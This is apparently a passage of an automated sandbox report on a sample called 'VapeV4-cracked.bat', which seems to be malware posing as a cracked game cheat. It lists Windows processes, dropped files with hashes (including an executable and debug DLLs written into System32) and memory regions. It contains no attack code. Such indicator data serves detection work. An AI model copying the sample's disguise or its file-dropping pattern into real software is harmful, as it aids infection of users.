C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ae54e9db2e89f2c54da8cc0bfcbd26bd
SHA1a88af6c673609ecbc51a1a60dfbc8577830d2b5d
SHA2565009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af
SHA512e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5f53207a5ca2ef5c7e976cbb3cb26d870
SHA149a8cc44f53da77bb3dfb36fc7676ed54675db43
SHA25619ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23
SHA512be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
193B
MD562fc8758c85fb0d08cd24eeddafeda2c
SHA1320fc202790b0ca6f65ff67e9397440c7d97eb20
SHA256ee0d15dce841e092ad1a2d4346a612410f8f950fdb019bc7b768f6346f2b5248
SHA512ca97e615bdcac137a936c10104a702e1529ed3470828f2c3a2f783345ebbef04cac8c051df636c714151671efea53a9b8912b6b0d0b5eafdac5fae1dfdc8f85d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5d90035855cfda1ec3a1c7665a5a169fb
SHA13eb1f37a6204668d3f574abd8c750c6aefd642af
SHA25635be9e42bb0effd6ec5110feb14334756ad5b1957a998fc433aa94cb9b5ed3db
SHA512eb764d01bb068601eaa322cff31c0ec90464af5eab534f87e4dd82da9fa98f68a3d69e6aeb2056617fc497ce87eaddd5ae35f52e4d19d51da8e4a93201c2f717
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD57f9992777f9749ace9e61ce41dc9faf6
SHA120ba9254528b4093e43116f7e04cf3a3acdc23d8
SHA256509c3193a54820abc2af2dad21150bf9d52211605a16a50281879b537215a7a2
SHA512ab787ce0cc596fd6b320b6ca682f521b8309df0b65d8a875013bde5a6941901dbc5c3d44f569695f6a327932bdb9ac08ecd8c7ff0c7c1de53ccfcfc80ebb3796
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD53db9e49de35dfabe0c88eb3dab2f26c3
SHA1fc3881aadd66b5509ac768f6cd238a5733f747b4
SHA256e940b7e45b20e4f6e04d5ddb36eb5bb12a730bc6aed822a1205fa589ae1adb97
SHA5120ce277d5cde1306d72cddce2f10a69341c449ffee39d13017accd99b05a006fdeba90104a7a20cd113bfd40f7aa52aaeee45577caf40746590273a8e41f25633
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
204B
MD51f0b47c49105c4436f23c2284187e5dd
SHA16fd906465ee30fdfbac328c9713334428209eec4
SHA2560fedda05bd21adb1a60261c94a7891cb3f6a3492782b1a862245d39c4bf57170
SHA51213bbafbf05b2f8ea3b82efa4021a7f85952ba4b85ac92c5c8c59f6341f2771cb556f86ee37ec7406e4d686763a1a8976472b755dea9e2810e857f08c1efb9002
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
204B
MD53b184f9eda161f5dcfe00b7a5a261a03
SHA1f32f8b780eeadc6b2fd1f0622fa18e4cd0e81ffa
SHA25655f4aafb562e908bba90f00e4aaa825a078ece4d12de79d9fadbc4a5530601ac
SHA512e5f22d7e3d67b6fcb6fd37ef2eb8069cfebc229c26ee4b0114c149dd6abc796a808d6b43e363ef378ad6a809a72b06fa5e9ad58920e9ff0f2cba60246c98a0c4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
10KB
MD5c5d8a9120e307260840f85f229c279f1
SHA12a1c08aba1af08b5e927fd0c5eb88dd07e28496e
SHA256ba8cdbf98c154fe5c842b953e407587171d6499e03f4f59a8457a3481a5b03db
SHA512322a9ebed5f3fb59b252bbd0ac1fd562d0d66fb0e8d8b67e7a8c5db0543cf6d73254d05951b17455d2636cf03d281d4d8bdbae8fa1ad75c5514c34a62c6748f3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
10KB
MD56313bcbb337b706f59a7189a215d4c5b
SHA1bfc7849e2d12789079ed134bbc93a47b3e8bebd3
SHA25636005808b1db854ac4cc1920e202364865883bbd7d85bd882328eef764916863
SHA5123f7050fa7e95f7231bea5edc6a3ede671c240a1d23215771db559dd96c171404aff5dd37bd98106f6eb2bfb8d07dfb7e761c54b063cb6072d9d4e2f813ef4c82
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xsa4j2t4.uc3.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\Desktop\VapeV4-cracked.batFilesize
12.5MB
MD58913eca34d27762a5ec07b236f8a09b0
SHA10cfaa984f78b88c2a545a03af26f4b4fef1dd03e
SHA25683be370335986f06373f4553cf5c3722a0a7ff1fd2874e9bf5170afbf133ec9d
SHA5121b0a05494c64bafff3231a8f10c5ce7defca0a267585a94834dd5e511273ff1b0f38b35427752abd9dd2b24f56a8f9e78f6b9519cda7cc5603afdf0416e1412d
-
C:\Users\Admin\Desktop\VapeV4-cracked.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows\System32\ucrtbased.dllFilesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
C:\Windows\System32\vcruntime140_1d.dllFilesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
C:\Windows\System32\vcruntime140d.dllFilesize
162KB
MD5a366d6623c14c377c682d6b5451575e6
SHA1a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA2567ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11
-
\??\pipe\LOCAL\crashpad_2308_WPKLYBYEMVESGBJUMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/336-257-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/336-256-0x0000021C8D720000-0x0000021C8D747000-memory.dmpFilesize
156KB
-
memory/532-283-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/532-282-0x000002314E770000-0x000002314E797000-memory.dmpFilesize
156KB
-
memory/612-245-0x0000014ADAC90000-0x0000014ADACB1000-memory.dmpFilesize
132KB
-
memory/612-247-0x0000014ADACC0000-0x0000014ADACE7000-memory.dmpFilesize
156KB
-
memory/612-248-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/632-232-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmpFilesize
2.0MB
-
memory/632-233-0x00007FF8613B0000-0x00007FF86146E000-memory.dmpFilesize
760KB
-
memory/632-231-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/632-243-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/632-230-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/664-253-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/664-252-0x0000018561970000-0x0000018561997000-memory.dmpFilesize
156KB
-
memory/680-267-0x000001B40FA00000-0x000001B40FA27000-memory.dmpFilesize
156KB
-
memory/680-268-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/952-259-0x00000245C3040000-0x00000245C3067000-memory.dmpFilesize
156KB
-
memory/952-260-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/1084-271-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/1084-270-0x0000017FEA7B0000-0x0000017FEA7D7000-memory.dmpFilesize
156KB
-
memory/1096-274-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/1096-273-0x000001A3DE0F0000-0x000001A3DE117000-memory.dmpFilesize
156KB
-
memory/1148-276-0x000001CCB0630000-0x000001CCB0657000-memory.dmpFilesize
156KB
-
memory/1148-277-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/1184-280-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/1184-279-0x00000224A45D0000-0x00000224A45F7000-memory.dmpFilesize
156KB
-
memory/1204-166-0x000001EC82760000-0x000001EC82784000-memory.dmpFilesize
144KB
-
memory/1204-173-0x000001ECAD040000-0x000001ECAD098000-memory.dmpFilesize
352KB
-
memory/1204-153-0x00007FF8441B3000-0x00007FF8441B5000-memory.dmpFilesize
8KB
-
memory/1204-154-0x000001EC82870000-0x000001EC82892000-memory.dmpFilesize
136KB
-
memory/1204-164-0x00007FF8441B0000-0x00007FF844C71000-memory.dmpFilesize
10.8MB
-
memory/1204-165-0x00007FF8441B0000-0x00007FF844C71000-memory.dmpFilesize
10.8MB
-
memory/1204-168-0x00007FF8613B0000-0x00007FF86146E000-memory.dmpFilesize
760KB
-
memory/1204-167-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmpFilesize
2.0MB
-
memory/1204-169-0x000001ECAB910000-0x000001ECAC9B0000-memory.dmpFilesize
16.6MB
-
memory/1204-171-0x000001ECACAB0000-0x000001ECACD9E000-memory.dmpFilesize
2.9MB
-
memory/1204-172-0x000001ECACDA0000-0x000001ECAD038000-memory.dmpFilesize
2.6MB
-
memory/1204-174-0x000001EC82790000-0x000001EC8279C000-memory.dmpFilesize
48KB
-
memory/1204-175-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmpFilesize
2.0MB
-
memory/1292-287-0x0000022F78FD0000-0x0000022F78FF7000-memory.dmpFilesize
156KB
-
memory/1292-288-0x00007FF822770000-0x00007FF822780000-memory.dmpFilesize
64KB
-
memory/3416-214-0x000001B19CE00000-0x000001B19CE50000-memory.dmpFilesize
320KB
-
memory/3416-205-0x000001B19BAC0000-0x000001B19C280000-memory.dmpFilesize
7.8MB
-
memory/3416-228-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmpFilesize
2.0MB
-
memory/3416-229-0x00007FF8613B0000-0x00007FF86146E000-memory.dmpFilesize
760KB
-
memory/3416-207-0x000001B19C6E0000-0x000001B19C792000-memory.dmpFilesize
712KB
-
memory/3416-204-0x000001B19B680000-0x000001B19BAC4000-memory.dmpFilesize
4.3MB
-
memory/3416-202-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmpFilesize
2.0MB
-
memory/3416-206-0x000001B19C280000-0x000001B19C6DC000-memory.dmpFilesize
4.4MB
-
memory/3416-203-0x00007FF8613B0000-0x00007FF86146E000-memory.dmpFilesize
760KB
-
memory/3416-208-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmpFilesize
2.0MB
-
memory/3416-215-0x000001B19CF10000-0x000001B19CFC2000-memory.dmpFilesize
712KB
-
memory/3416-227-0x000001B19CB70000-0x000001B19CB9E000-memory.dmpFilesize
184KB
-
memory/3416-216-0x000001B19D240000-0x000001B19D402000-memory.dmpFilesize
1.8MB
-
memory/3416-226-0x000001B19CDB0000-0x000001B19CDEC000-memory.dmpFilesize
240KB
-
memory/3792-177-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/3792-178-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB